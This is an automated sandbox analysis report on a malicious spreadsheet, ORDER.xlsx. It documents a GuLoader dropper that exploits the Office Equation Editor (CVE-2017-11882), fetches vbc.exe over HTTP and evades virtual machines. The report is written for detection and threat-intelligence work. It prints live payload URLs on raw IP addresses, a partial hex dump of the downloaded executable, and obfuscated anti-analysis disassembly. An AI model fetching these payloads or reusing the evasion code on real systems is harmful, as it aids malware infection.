Windows Analysis Report ORDER.xlsx

Overview

General Information

Sample Name: ORDER.xlsx
Analysis ID: 482999
MD5: c82cca02226f7910cd552124c3cf6e7f
SHA1: 79214e25d81860d25a8e88df99d487394c029da1
SHA256: 5a9f905842cac5fabeb0719527960d0ff67d2c5fc88f163b4f2dcbb366fac62f
Tags: GuLoaderVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin"}
Multi AV Scanner detection for submitted file
Source: ORDER.xlsx Virustotal: Detection: 28% Perma Link
Source: ORDER.xlsx ReversingLabs: Detection: 25%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 67MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 10:13:58 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 22:47:50 GMTETag: "21000-5cbe84130fcf7"Accept-Ranges: bytesContent-Length: 135168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 95 b4 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 c3 37 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 b9 01 00 28 00 00 00 00 10 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 ae 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /reverse/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ED60BCE4.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED60BCE4.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /reverse/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_003669E3 6_2_003669E3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B43F 6_2_0036B43F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00363822 6_2_00363822
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B412 6_2_0036B412
Source: C:\Users\Public\vbc.exe Code function: 6_2_00363008 6_2_00363008
Source: C:\Users\Public\vbc.exe Code function: 6_2_00365067 6_2_00365067
Source: C:\Users\Public\vbc.exe Code function: 6_2_00364C64 6_2_00364C64
Source: C:\Users\Public\vbc.exe Code function: 6_2_00364460 6_2_00364460
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036586D 6_2_0036586D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369445 6_2_00369445
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B494 6_2_0036B494
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A092 6_2_0036A092
Source: C:\Users\Public\vbc.exe Code function: 6_2_00363491 6_2_00363491
Source: C:\Users\Public\vbc.exe Code function: 6_2_00364C9F 6_2_00364C9F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369C9B 6_2_00369C9B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00365485 6_2_00365485
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B883 6_2_0036B883
Source: C:\Users\Public\vbc.exe Code function: 6_2_003654F8 6_2_003654F8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00365CE0 6_2_00365CE0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B4D9 6_2_0036B4D9
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A538 6_2_0036A538
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B52D 6_2_0036B52D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036391F 6_2_0036391F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036510B 6_2_0036510B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B57C 6_2_0036B57C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369D66 6_2_00369D66
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036595D 6_2_0036595D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003631BF 6_2_003631BF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003699AD 6_2_003699AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369D9B 6_2_00369D9B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00362D83 6_2_00362D83
Source: C:\Users\Public\vbc.exe Code function: 6_2_003631FB 6_2_003631FB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003651ED 6_2_003651ED
Source: C:\Users\Public\vbc.exe Code function: 6_2_003699EB 6_2_003699EB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003639D3 6_2_003639D3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003655D3 6_2_003655D3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00365DC0 6_2_00365DC0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00365A3F 6_2_00365A3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A603 6_2_0036A603
Source: C:\Users\Public\vbc.exe Code function: 6_2_00362672 6_2_00362672
Source: C:\Users\Public\vbc.exe Code function: 6_2_00364AB7 6_2_00364AB7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003656BF 6_2_003656BF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003636BB 6_2_003636BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A6A5 6_2_0036A6A5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003666AE 6_2_003666AE
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B6AF 6_2_0036B6AF
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036AA94 6_2_0036AA94
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369A84 6_2_00369A84
Source: C:\Users\Public\vbc.exe Code function: 6_2_00364AFC 6_2_00364AFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003632EB 6_2_003632EB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003652D1 6_2_003652D1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00363AC5 6_2_00363AC5
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369ACD 6_2_00369ACD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00364336 6_2_00364336
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A739 6_2_0036A739
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A32B 6_2_0036A32B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00363710 6_2_00363710
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A710 6_2_0036A710
Source: C:\Users\Public\vbc.exe Code function: 6_2_00365B09 6_2_00365B09
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369FBF 6_2_00369FBF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00362BBC 6_2_00362BBC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A3BD 6_2_0036A3BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003643BB 6_2_003643BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036B7A1 6_2_0036B7A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036A7AB 6_2_0036A7AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00369B9B 6_2_00369B9B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036938A 6_2_0036938A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00365789 6_2_00365789
Source: C:\Users\Public\vbc.exe Code function: 6_2_00365BF1 6_2_00365BF1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003623DA 6_2_003623DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003653C3 6_2_003653C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003633CF 6_2_003633CF
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003669E3 NtAllocateVirtualMemory, 6_2_003669E3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00366A43 NtAllocateVirtualMemory, 6_2_00366A43
Source: C:\Users\Public\vbc.exe Code function: 6_2_00366B38 NtAllocateVirtualMemory, 6_2_00366B38
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: ORDER.xlsx Virustotal: Detection: 28%
Source: ORDER.xlsx ReversingLabs: Detection: 25%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$ORDER.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREDE6.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419564 push esi; retn 000Ch 6_2_004196B9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407A1A push edi; ret 6_2_00407BB6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405CE3 pushad ; ret 6_2_00405CE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_004060E5 push ds; ret 6_2_004060E6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408903 push edi; retf 6_2_00408906
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407B8C push edi; ret 6_2_00407BB6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036001A pushad ; retf 6_2_0036001C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0036007A pushad ; retf 6_2_0036007C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00360E7A push 81D7EEE9h; ret 6_2_00360E80
Source: C:\Users\Public\vbc.exe Code function: 6_2_00362268 push ds; retf 6_2_00362276
Source: C:\Users\Public\vbc.exe Code function: 6_2_00361B92 push esp; retf 6_2_00361B95
Source: C:\Users\Public\vbc.exe Code function: 6_2_003603FD pushad ; retf 6_2_003603FE
Source: initial sample Static PE information: section name: .text entropy: 7.10018192133
Source: initial sample Static PE information: section name: .text entropy: 7.10018192133

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000369799 second address: 0000000000369799 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 29D86A1Dh 0x00000007 sub eax, 1A2EF41Ch 0x0000000c xor eax, 7F8AA893h 0x00000011 xor eax, 7023DE93h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FF3F0AF7358h 0x0000001e lfence 0x00000021 mov edx, 100ABEA1h 0x00000026 xor edx, 6F0D7B68h 0x0000002c xor edx, 62879C8Ah 0x00000032 xor edx, 627E5957h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d jmp 00007FF3F0AF739Ah 0x0000003f test ax, cx 0x00000042 cmp ecx, edx 0x00000044 test ebx, eax 0x00000046 cmp edx, 8B44DCE9h 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 add edi, edx 0x00000052 dec dword ptr [ebp+000000F8h] 0x00000058 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005f jne 00007FF3F0AF72E8h 0x00000061 jmp 00007FF3F0AF739Eh 0x00000063 test edx, 67D05910h 0x00000069 call 00007FF3F0AF73A3h 0x0000006e call 00007FF3F0AF7379h 0x00000073 lfence 0x00000076 mov edx, 100ABEA1h 0x0000007b xor edx, 6F0D7B68h 0x00000081 xor edx, 62879C8Ah 0x00000087 xor edx, 627E5957h 0x0000008d mov edx, dword ptr [edx] 0x0000008f 